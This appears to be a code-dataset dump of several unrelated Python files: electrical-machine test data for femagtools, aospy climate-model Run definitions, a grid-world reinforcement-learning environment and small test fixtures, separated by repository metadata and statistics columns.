[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"rotor_eddy": [[9.341, 11.38, 15.2, 17.51, 20.72, 25.78],
[9.344, 10.75, 14.01,
17.45, 23.39, 26.87],
[9.341, 10.1, 12.99,
17.32, 25.55, 24.09],
[9.344, 9.369, 11.88,
16.8, 24.69, 26.68],
[9.341, 8.625, 10.7,
15.26, 26.18, 31.62],
[9.344, 8.098, 10.0,
13.66, 26.79, 32.56],
[9.341, 7.896, 9.607,
13.09, 26.29, 31.62],
[9.344, 8.1, 10.01,
13.65, 26.77, 32.54],
[9.341, 8.631, 10.7,
15.3, 26.22, 31.66],
[9.344, 9.38, 11.9,
16.78, 24.63, 26.67],
[9.341, 10.12, 12.98,
17.29, 25.54, 24.07],
[9.344, 10.77, 14.04,
17.47, 23.37, 26.84],
[9.341, 11.41, 15.11, 17.53, 20.72, 25.68]]}},
{"ex_current": 15.0, "i1": [0.0, 82.0, 164.0, 246.0, 328.0, 410.0],
"beta": [-180.0, -165.0, -150.0, -135.0, -120.0, -105.0, -90.0, -75.0, -60.0, -45.0, -30.0, -15.0, 0.0],
"psid": [[0.08538000000000001, 0.08632, 0.08674000000000001, 0.08568, 0.08360000000000001, 0.08089],
[0.08538000000000001, 0.0841, 0.08291,
0.08068, 0.07744, 0.07309],
[0.08538000000000001, 0.08177, 0.07852,
0.07471, 0.06989999999999999, 0.06288],
[0.08538000000000001, 0.07958,
0.07383, 0.0677, 0.06053, 0.04921],
[0.08538000000000001, 0.07769, 0.06967,
0.06121, 0.05132, 0.035129999999999995],
[0.08538000000000001, 0.07636,
0.06691, 0.0574, 0.04599, 0.02561],
[0.08538000000000001, 0.0759, 0.06608,
0.05631, 0.0442, 0.02215],
[0.08538000000000001, 0.07636, 0.06688,
0.057390000000000004, 0.04598, 0.02561],
[0.08538000000000001, 0.07769, 0.06969,
0.061189999999999994, 0.05141, 0.03511],
[0.08538000000000001, 0.07957,
0.07382000000000001, 0.06769, 0.06052, 0.0492],
[0.08538000000000001, 0.08177, 0.07852,
0.0747, 0.06989000000000001, 0.06286],
[0.08538000000000001, 0.08409, 0.08292,
0.08069, 0.07743, 0.07309],
[0.08538000000000001, 0.08632, 0.08674000000000001, 0.08568, 0.08360000000000001, 0.08089]],
"psiq": [[-0.0, -0.01817, -0.03262, -0.04374, -0.05263, -0.06016],
[-0.0, -0.01727, -0.03172, -0.04368, -
0.053810000000000004, -0.06276],
[-0.0, -0.015220000000000001, -0.028390000000000002, -
0.0402, -0.050980000000000004, -0.06191000000000001],
[-0.0, -0.012219999999999998, -0.02254, -
0.032459999999999996, -0.042230000000000004, -0.05394],
[-0.0, -0.00848, -0.01519, -
0.02162, -0.02855, -0.03774],
[-0.0, -0.0042710000000000005, -
0.007298, -0.01055, -0.0142, -0.01917],
[-0.0, -7.13e-10, -1.1890000000000001e-09, -
1.741e-09, -2.371e-09, -3.221e-09],
[0.0, 0.004275999999999999, 0.007284,
0.01053, 0.0142, 0.01916],
[0.0, 0.008473, 0.01516, 0.02161,
0.02848, 0.037720000000000004],
[0.0, 0.012210000000000002, 0.02253, 0.03243,
0.042210000000000004, 0.053930000000000006],
[0.0, 0.015200000000000002, 0.02837,
0.04022, 0.050960000000000005, 0.06189],
[0.0, 0.01724, 0.03171,
0.043629999999999995, 0.05377, 0.06275],
[0.0, 0.01815, 0.032600000000000004, 0.04371, 0.05264, 0.06014]],
"losses": {"speed": 50.0, "ef": [1.45, 1.45], "hf": [1.0, 1.0],
"styoke_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"stteeth_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"styoke_eddy": [[172.6, 182.3, 203.0, 220.5, 232.9, 241.5],
[172.6, 173.6, 187.9,
203.2, 215.8, 224.2],
[172.6, 164.3, 168.1,
177.9, 188.4, 197.0],
[172.6, 156.0, 147.9,
147.1, 150.1, 156.1],
[172.6, 149.3, 132.4,
121.3, 112.4, 108.1],
[172.6, 145.1, 123.2,
104.7, 85.45, 68.8],
[172.6, 143.8, 120.4,
98.86, 75.42, 53.11],
[172.6, 145.1, 123.2,
104.6, 85.42, 68.74],
[172.6, 149.3, 132.4,
121.2, 112.4, 108.0],
[172.6, 156.0, 147.8,
146.9, 150.0, 156.0],
[172.6, 164.3, 168.0,
178.0, 188.3, 196.9],
[172.6, 173.5, 187.9,
203.2, 215.6, 224.2],
[172.6, 182.3, 203.0, 220.4, 233.1, 241.4]],
"stteeth_eddy": [[122.3, 123.8, 131.5, 141.0, 148.3, 151.2],
[122.3, 123.6, 129.2,
136.9, 143.8, 147.6],
[122.3, 123.8, 127.6,
135.2, 144.0, 151.7],
[122.3, 124.6, 128.9,
138.1, 151.8, 169.8],
[122.3, 125.9, 131.7,
140.7, 153.0, 177.7],
[122.3, 127.3, 131.8,
133.8, 136.8, 155.8],
[122.3, 127.8, 130.9,
128.9, 127.5, 141.7],
[122.3, 127.3, 131.9,
133.8, 136.7, 155.7],
[122.3, 125.9, 131.6,
140.6, 152.8, 177.5],
[122.3, 124.6, 128.9,
138.0, 151.7, 169.7],
[122.3, 123.8, 127.5,
135.2, 143.8, 151.4],
[122.3, 123.6, 129.1,
136.8, 143.6, 147.5],
[122.3, 123.7, 131.5, 141.0, 148.6, 151.1]],
"rotor_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"rotor_eddy": [[10.68, 12.54, 15.17, 17.28, 18.95, 20.42],
[10.68, 11.99, 14.47,
17.12, 19.51, 21.82],
[10.68, 11.4, 13.64,
16.84, 20.53, 25.05],
[10.68, 10.7, 12.63,
16.61, 21.59, 28.27],
[10.68, 9.812, 11.59,
15.2, 21.46, 28.51],
[10.68, 9.266, 10.76,
14.1, 19.6, 27.15],
[10.68, 9.142, 10.49,
13.97, 19.39, 26.63],
[10.68, 9.213, 10.61,
14.07, 19.62, 27.14],
[10.68, 9.836, 11.59,
15.14, 20.8, 28.45],
[10.68, 10.61, 12.58,
16.6, 21.58, 28.23],
[10.68, 11.52, 13.67,
16.88, 20.49, 25.0],
[10.68, 12.06, 14.5,
17.56, 19.53, 21.85],
[10.68, 12.57, 15.18, 17.33, 18.99, 20.43]]}}]}
return femagtools.machine.sm.SynchronousMachine(smpars)
def test_sm(sm):
u1 = 230
f1 = 50
iqdf = sm.iqd_torque(120)
assert pytest.approx(iqdf, rel=0.01) == [271.5, -45.31, 5.4]
| 73.126095
| 123
| 0.251311
| 9,341
| 83,510
| 2.241088
| 0.117011
| 0.329703
| 0.476498
| 0.613929
| 0.517722
| 0.434174
| 0.421515
| 0.343222
| 0.331231
| 0.296217
| 0
| 0.610845
| 0.607795
| 83,510
| 1,141
| 124
| 73.190184
| 0.028303
| 0
| 0
| 0.328056
| 0
| 0
| 0.009113
| 0
| 0
| 0
| 0
| 0
| 0.00088
| 1
| 0.001759
| false
| 0
| 0.003518
| 0
| 0.006157
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a03ed9501ed65d2386151942d8dce042f05f393c
| 113
|
py
|
Python
|
tests/conftest.py
|
mgrau/atomphys
|
8624748eb61a2c6e1f70a5784a9d3fc242ff50b1
|
[
"MIT"
] | 3
|
2021-10-07T11:33:43.000Z
|
2022-03-16T13:27:17.000Z
|
tests/conftest.py
|
mgrau/atomphys
|
8624748eb61a2c6e1f70a5784a9d3fc242ff50b1
|
[
"MIT"
] | 2
|
2021-10-07T14:49:36.000Z
|
2021-10-21T20:36:36.000Z
|
tests/conftest.py
|
mgrau/atomphys
|
8624748eb61a2c6e1f70a5784a9d3fc242ff50b1
|
[
"MIT"
] | null | null | null |
import pytest
from atomphys import Atom
@pytest.fixture(scope="module")
def rubidium():
return Atom("Rb")
| 12.555556
| 31
| 0.716814
| 15
| 113
| 5.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159292
| 113
| 8
| 32
| 14.125
| 0.852632
| 0
| 0
| 0
| 0
| 0
| 0.070796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
a07a0edfe24d8614d2f8e66fce437442943c42b6
| 235
|
py
|
Python
|
interage/api/managers/__init__.py
|
IntMed/interage_python_sdk
|
70ea7d0b850c7664113210a18305a0fcffe5ed7f
|
[
"MIT"
] | 1
|
2017-03-02T11:47:32.000Z
|
2017-03-02T11:47:32.000Z
|
interage/api/managers/__init__.py
|
weynelucas/interage_python_sdk
|
70ea7d0b850c7664113210a18305a0fcffe5ed7f
|
[
"MIT"
] | null | null | null |
interage/api/managers/__init__.py
|
weynelucas/interage_python_sdk
|
70ea7d0b850c7664113210a18305a0fcffe5ed7f
|
[
"MIT"
] | null | null | null |
from .base import APIManager
from .managers import (InteracaoAPIManager, PrincipioAtivoAPIManager, MedicamentoAPIManager)
__all__ = [
'APIManager',
'InteracaoAPIManager', 'PrincipioAtivoAPIManager', 'MedicamentoAPIManager',
]
| 29.375
| 92
| 0.795745
| 15
| 235
| 12.2
| 0.6
| 0.469945
| 0.699454
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114894
| 235
| 7
| 93
| 33.571429
| 0.879808
| 0
| 0
| 0
| 0
| 0
| 0.314894
| 0.191489
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
a091c5fa076cabb5a88c655a96b60dfb213ac029
| 8,778
|
py
|
Python
|
aospy_user/runs/gfdl_runs.py
|
spencerahill/aospy-obj-lib
|
76803806e8c6b0042c901735eed1c88042d4e4ed
|
[
"Apache-2.0"
] | 3
|
2015-10-27T19:32:17.000Z
|
2021-05-07T12:41:30.000Z
|
aospy_user/runs/gfdl_runs.py
|
spencerahill/aospy-obj-lib
|
76803806e8c6b0042c901735eed1c88042d4e4ed
|
[
"Apache-2.0"
] | 11
|
2015-09-25T15:45:59.000Z
|
2020-03-31T13:50:29.000Z
|
aospy_user/runs/gfdl_runs.py
|
spencerahill/aospy-obj-lib
|
76803806e8c6b0042c901735eed1c88042d4e4ed
|
[
"Apache-2.0"
] | null | null | null |
"""aospy.Run objects for simulations from various GFDL models."""
import datetime
from aospy import Run
from aospy.data_loader import GFDLDataLoader
# SM2.1
sm2_cont = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/Yi.Ming/sm2.1_fixed/SM2.1U_Control-1860_lm2_aie'
'_rerun6.YIM/pp'),
data_dur=20,
data_start_date=datetime.datetime(1, 1, 1),
data_end_date=datetime.datetime(120, 12, 31),
),
)
sm2_aero = Run(
name='aero',
data_loader=GFDLDataLoader(
data_direc=('/archive/Yi.Ming/sm2.1_fixed/SM2.1U_Control-1860_lm2_aie2'
'_rerun6.YIM/pp'),
data_dur=100,
data_start_date=datetime.datetime(1, 1, 1),
data_end_date=datetime.datetime(100, 12, 31),
),
)
sm2_gas = Run(
name='gas',
data_loader=GFDLDataLoader(
data_direc=('/archive/Yi.Ming/sm2.1_fixed/SM2.1U_Control-1860_lm2_aie3'
'_rerun8.YIM/pp'),
data_dur=5,
data_start_date=datetime.datetime(1, 1, 1),
data_end_date=datetime.datetime(80, 12, 31),
),
)
sm2_both = Run(
name='both',
data_loader=GFDLDataLoader(
data_direc=('/archive/Yi.Ming/sm2.1_fixed/SM2.1U_Control-1860_lm2_aie4'
'_rerun6.YIM/pp'),
data_dur=100,
data_start_date=datetime.datetime(1, 1, 1),
data_end_date=datetime.datetime(100, 12, 31),
),
)
# c48-HiRAM
hiram_c48_0 = Run(
name='ming0',
data_loader=GFDLDataLoader(
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0/'
'gfdl.ncrc2-intel-prod/pp'),
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(1995, 12, 31),
),
)
hiram_c48_0_p2K = Run(
name='ming0_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0'
'_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_1 = Run(
name='ming1',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0b/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_1_p2K = Run(
name='ming1_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X0b_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_2 = Run(
name='ming2',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0e/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_2_p2K = Run(
name='ming2_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X0e_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_3 = Run(
name='ming3',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0f/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_3_p2K = Run(
name='ming3_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X0f_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_4 = Run(
name='ming4',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0c/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_4_p2K = Run(
name='ming4_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X0c_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_5 = Run(
name='ming5',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X01/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_5_p2K = Run(
name='ming5_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X01_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_6 = Run(
name='ming6',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X02/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_6_p2K = Run(
name='ming6_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X02_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_7 = Run(
name='ming7',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X03/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_7_p2K = Run(
name='ming7_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X03_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_8 = Run(
name='ming8',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X04/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_8_p2K = Run(
name='ming8_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X04_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
# AM3_c90
am3c90_cont = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/h1g/FMS/siena_201203/c90L48_am3p10_v6_clim/'
'gfdl.ncrc2-intel-prod-openmp/pp'),
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(1990, 12, 31),
),
)
am3c90_p2K = Run(
name='p2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/h1g/FMS/siena_201203/c90L48_am3p10_v6_clim_p2k/'
'gfdl.ncrc2-intel-prod-openmp/pp'),
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(1990, 12, 31),
),
)
# AM2.5
am2p5_cont = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/miz/hiramdp/siena_201204/c180l32_am2_C0/'
'gfdl.ncrc2-intel-prod/pp'),
data_dur=10,
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(2000, 12, 31),
),
)
am2p5_p2K = Run(
name='p2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/miz/hiramdp/siena_201204/c180l32_am2_C0_p2K/'
'gfdl.ncrc2-intel-prod/pp'),
data_dur=10,
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(2000, 12, 31),
),
)
# AM4 prototypes
am4_a1c = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/Ming.Zhao/awg/tikal_201403/c96L48_am4a1_'
'2000climo_highsen1/gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_a1p2k = Run(
name='+2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/Ming.Zhao/awg/tikal_201403/c96L48_am4a1_'
'2000climo_highsen1_p2K/gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_a2c = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/cjg/awg/tikal_201403/c96L48_am4a2r1_'
'2000climo/gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_a2p2k = Run(
name='+2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/cjg/awg/tikal_201403/c96L48_am4a2r1_'
'2000climo_p2K/gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_c1c = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/miz/tikal_201409_awgUpdates_mom6_2014.08.29/'
'c96L48_am4c1r2_2000climo/'
'gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_c1p2k = Run(
name='+2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/miz/tikal_201409_awgUpdates_mom6_2014.08.29/'
'c96L48_am4c1r2_2000climo_p2K/gfdl.ncrc2-intel-prod-'
'openmp/pp'),
),
)
| 31.017668
| 79
| 0.63306
| 1,129
| 8,778
| 4.607617
| 0.117803
| 0.096117
| 0.147636
| 0.096886
| 0.888889
| 0.885429
| 0.87697
| 0.870819
| 0.743368
| 0.733948
| 0
| 0.115339
| 0.233538
| 8,778
| 282
| 80
| 31.12766
| 0.657848
| 0.011962
| 0
| 0.525926
| 0
| 0
| 0.327254
| 0.299434
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011111
| 0
| 0.011111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a09ae054433e28a292f4a34248304c8ad9acb4c3
| 4,332
|
py
|
Python
|
Reinforcement Learning/grid_world.py
|
jakelong0509/master
|
0507a796d0c40d5b28e54f162e5639ddfe2d1c2a
|
[
"MIT"
] | null | null | null |
Reinforcement Learning/grid_world.py
|
jakelong0509/master
|
0507a796d0c40d5b28e54f162e5639ddfe2d1c2a
|
[
"MIT"
] | null | null | null |
Reinforcement Learning/grid_world.py
|
jakelong0509/master
|
0507a796d0c40d5b28e54f162e5639ddfe2d1c2a
|
[
"MIT"
] | null | null | null |
"""import numpy as np
import matplotlib.pyplot as plt
class Grid:
def __init__(self, height, weight, start):
self.height = height
self.weight = weight
self.i = start[0]
self.j = start[1]
def set(self, rewards, actions):
self.rewards = rewards
self.actions = actions
def set_state(self, s):
self.i = s[0]
self.j = s[1]
def current_state(self):
return (self.i, self.j)
def is_terminal(self, s):
return s not in self.actions
def move(self, action):
if action in self.actions[(self.i, self.j)]:
if action == 'U':
self.i -= 1
if action == "D":
self.i += 1
if action == "R":
self.j += 1
if action == "L":
self.j -= 1
return self.rewards.get((self.i, self.j), 0)
def undo_move(self, action):
if action == 'U':
self.i += 1
if action == 'D':
self.i -= 1
if action == 'R':
self.j -= 1
if action == 'L':
self.j += 1
assert(self.current_state in self.all_states)
def game_over(self):
return (self.i, self.j) not in self.actions
def all_states(self):
return set(self.actions.keys()) | set(self.rewards.keys())
def standard_grid():
g = Grid(3, 4, (0,2))
rewards = {(0,3) : 1, (1,3) : -1}
actions = {
(0, 0): ('D', 'R'),
(0, 1): ('L', 'R'),
(0, 2): ('L', 'D', 'R'),
(1, 0): ('U', 'D'),
(1, 2): ('U', 'D', 'R'),
(2, 0): ('U', 'R'),
(2, 1): ('L', 'R'),
(2, 2): ('L', 'R', 'U'),
(2, 3): ('L', 'U'),
}
g.set(rewards, actions)
return g
def negative_grid(step_cost = -0.1):
g = standard_grid()
g.rewards.update({
(0, 0): step_cost,
(0, 1): step_cost,
(0, 2): step_cost,
(1, 0): step_cost,
(1, 2): step_cost,
(2, 0): step_cost,
(2, 1): step_cost,
(2, 2): step_cost,
(2, 3): step_cost,
})
return g
"""
class Grid: #Environment
def __init__(self, width, height, start):
self.height = height
self.width = width
self.i = start[0]
self.j = start[1]
def set(self, rewards , actions):
self.rewards = rewards
self.actions = actions
def set_state(self, s):
self.i = s[0]
self.j = s[1]
def current_state(self):
return (self.i, self.j)
def game_over(self):
return (self.i, self.j) not in self.actions
def is_terminal(self, s):
return s not in self.actions
def move(self, action):
if action in self.actions[(self.i, self.j)]:
if action == 'U':
self.i -= 1
if action == 'D':
self.i += 1
if action == 'R':
self.j += 1
if action == 'L':
self.j -= 1
return self.rewards.get((self.i, self.j), 0)
def undo_move(self, action):
if action == 'U':
self.i += 1
if action == 'D':
self.i -= 1
if action == 'R':
self.j -= 1
if action == 'L':
self.j += 1
assert(self.current_state in self.all_states)
def all_states(self):
return set(self.actions.keys()) | set(self.rewards.keys())
def standard_grid():
g = Grid(3, 4, (2,0))
rewards = {(0,3) : 1, (1,3) : -1}
actions = {
(0, 0): ('D', 'R'),
(0, 1): ('L', 'R'),
(0, 2): ('L', 'D', 'R'),
(1, 0): ('U', 'D'),
(1, 2): ('U', 'D', 'R'),
(2, 0): ('U', 'R'),
(2, 1): ('L', 'R'),
(2, 2): ('L', 'R', 'U'),
(2, 3): ('L', 'U'),
}
g.set(rewards, actions)
return g
def negative_grid(step_cost = -0.1):
g = standard_grid()
g.rewards.update({
(0, 0): step_cost,
(0, 1): step_cost,
(0, 2): step_cost,
(1, 0): step_cost,
(1, 2): step_cost,
(2, 0): step_cost,
(2, 1): step_cost,
(2, 2): step_cost,
(2, 3): step_cost,
})
return g
| 25.482353
| 67
| 0.427516
| 586
| 4,332
| 3.075085
| 0.095563
| 0.055494
| 0.059933
| 0.044395
| 0.921199
| 0.893452
| 0.893452
| 0.893452
| 0.893452
| 0.893452
| 0
| 0.046529
| 0.394737
| 4,332
| 169
| 68
| 25.633136
| 0.640732
| 0.482456
| 0
| 0.253521
| 0
| 0
| 0.014037
| 0
| 0
| 0
| 0
| 0
| 0.014085
| 1
| 0.15493
| false
| 0
| 0
| 0.056338
| 0.267606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
261a6512c03ec6c0a8df024482454299e770ae00
| 30
|
py
|
Python
|
src/nvim/testdir/pyxfile/pyx.py
|
uga-rosa/neovim
|
afbf89dc0120b1db5782a0bf807dc7c8db70ccf6
|
[
"Vim"
] | 48,021
|
2015-01-01T07:55:49.000Z
|
2022-03-31T23:54:18.000Z
|
src/nvim/testdir/pyxfile/pyx.py
|
uga-rosa/neovim
|
afbf89dc0120b1db5782a0bf807dc7c8db70ccf6
|
[
"Vim"
] | 13,385
|
2015-01-01T05:24:41.000Z
|
2022-03-31T22:59:21.000Z
|
src/nvim/testdir/pyxfile/pyx.py
|
uga-rosa/neovim
|
afbf89dc0120b1db5782a0bf807dc7c8db70ccf6
|
[
"Vim"
] | 5,282
|
2015-01-02T08:22:32.000Z
|
2022-03-31T14:33:22.000Z
|
import sys

# Report the running interpreter's version string (test fixture: the
# surrounding suite checks which Python the pyx mechanism selected).
sys.stdout.write(sys.version + "\n")
| 10
| 18
| 0.8
| 5
| 30
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 2
| 19
| 15
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
cd24ef7bb022cb5344f4779e07050be2e6b406ce
